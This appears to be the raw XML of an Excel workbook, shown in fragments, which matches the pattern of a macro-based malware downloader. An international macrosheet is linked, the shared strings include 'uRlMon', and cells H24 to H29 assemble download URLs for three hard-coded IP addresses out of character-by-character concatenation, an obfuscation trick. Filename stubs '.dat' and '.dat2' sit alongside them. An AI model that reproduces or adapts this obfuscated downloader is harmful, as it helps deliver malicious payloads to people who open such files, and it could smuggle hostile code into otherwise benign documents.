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rdi\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{78B28A4A-2F3F-4781-BCE5-49F04E83CF7C}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="26010" windowHeight="13710" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="3" r:id="rId1"/>
    <sheet name="Loby" sheetId="5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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="2" uniqueCount="2">
  <si>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uRlMon</t>
  </si>
  <si>
    <t>JJCCBB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</si>
</sst>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1" fillId="2" borderId="0" xfId="1" applyFill="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1"/>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Обычный 2" xfId="1" xr:uid="{B0600A8E-9F36-49B9-8F0C-4AC199A3193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microsoft.com/office/2006/relationships/xlIntlMacrosheet" Target="macrosheets/intlsheet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382928</xdr:colOff>
      <xdr:row>45</xdr:row>
      <xdr:rowOff>0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AD948BF6-29CD-40AB-8009-B6C77CD29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6928" cy="8572500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9B5048D-8C7D-40B0-9741-D7729BFD0DEE}">
  <dimension ref="H9:K29"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="16384" width="9.140625" style="2"/>
  </cols>
  <sheetData>
    <row r="9" spans="9:9" x14ac:dyDescent="0.25">
      <c r="I9" s="2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="9:9" x14ac:dyDescent="0.25">
      <c r="I11" s="2" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="8:11" x14ac:dyDescent="0.25">
      <c r="K17" s="2">
        <f>NOW()</f>
        <v>44508.557876273146</v>
      </c>
    </row>
    <row r="18" spans="8:11" x14ac:dyDescent="0.25">
      <c r="K18" s="2" t="str">
        <f>".dat"</f>
        <v>.dat</v>
      </c>
    </row>
    <row r="19" spans="8:11" x14ac:dyDescent="0.25">
      <c r="K19" s="2" t="str">
        <f>".dat2"</f>
        <v>.dat2</v>
      </c>
    </row>
    <row r="24" spans="8:11" x14ac:dyDescent="0.25">
      <c r="H24" s="2" t="str">
        <f>"h"&amp;"t"&amp;"t"&amp;"p"&amp;":"&amp;""&amp;"/"&amp;""&amp;"/"&amp;"1"&amp;"90"&amp;"."&amp;""&amp;"1"&amp;"4"&amp;"."&amp;"37"&amp;"."&amp;"89"&amp;"/"</f>
        <v>http://190.14.37.89/</v>
      </c>
    </row>
    <row r="25" spans="8:11" x14ac:dyDescent="0.25">
      <c r="H25" s="2" t="str">
        <f>"h"&amp;"t"&amp;"t"&amp;"p"&amp;":"&amp;""&amp;"/"&amp;""&amp;"/74"&amp;"."&amp;""&amp;"1"&amp;""&amp;"1"&amp;"9"&amp;"."&amp;""&amp;"1"&amp;"95"&amp;"."&amp;""&amp;"1"&amp;""&amp;"1"&amp;"4"&amp;"/"</f>
        <v>http://74.119.195.114/</v>
      </c>
    </row>
    <row r="26" spans="8:11" x14ac:dyDescent="0.25">
      <c r="H26" s="2" t="str">
        <f>"h"&amp;"t"&amp;"t"&amp;"p"&amp;":"&amp;""&amp;"/"&amp;""&amp;"/2"&amp;"1"&amp;"2"&amp;"."&amp;"6"&amp;"."&amp;"44"&amp;"."&amp;"229"&amp;"/"</f>
        <v>http://212.6.44.229/</v>
      </c>
    </row>
    <row r="27" spans="8:11" x14ac:dyDescent="0.25">
      <c r="H27" s="2" t="str">
        <f>"h"&amp;"t"&amp;"t"&amp;"p"&amp;":"&amp;""&amp;"/"&amp;""&amp;"/"&amp;"1"&amp;"90"&amp;"."&amp;""&amp;"1"&amp;"4"&amp;"."&amp;"37"&amp;"."&amp;"89"&amp;"/"</f>
        <v>http://190.14.37.89/</v>
      </c>
    </row>
    <row r="28" spans="8:11" x14ac:dyDescent="0.25">
      <c r="H28" s="2" t="str">
        <f>"h"&amp;"t"&amp;"t"&amp;"p"&amp;":"&amp;""&amp;"/"&amp;""&amp;"/74"&amp;"."&amp;""&amp;"1"&amp;""&amp;"1"&amp;"9"&amp;"."&amp;""&amp;"1"&amp;"95"&amp;"."&amp;""&amp;"1"&amp;""&amp;"1"&amp;"4"&amp;"/"</f>
        <v>http://74.119.195.114/</v>
      </c>
    </row>
    <row r="29" spans="8:11" x14ac:dyDescent="0.25">
      <c r="H29" s="2" t="str">
        <f>"h"&amp;"t"&amp;"t"&amp;"p"&amp;":"&amp;""&amp;"/"&amp;""&amp;"/2"&amp;"1"&amp;"2"&amp;"."&amp;"6"&amp;"."&amp;"44"&amp;"."&amp;"229"&amp;"/"</f>
        <v>http://212.6.44.229/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D1141-0E80-48BD-B26C-93FB9EB4A9EA}">
  <sheetPr codeName="Sheet2"/>
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView showGridLines="0" showRowColHeaders="0" tabSelected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Loby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Hordi</dc:creator>
  <cp:lastModifiedBy>Bolad</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:17:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-11T09:15:38Z</dcterms:modified>
</cp:coreProperties>
</file>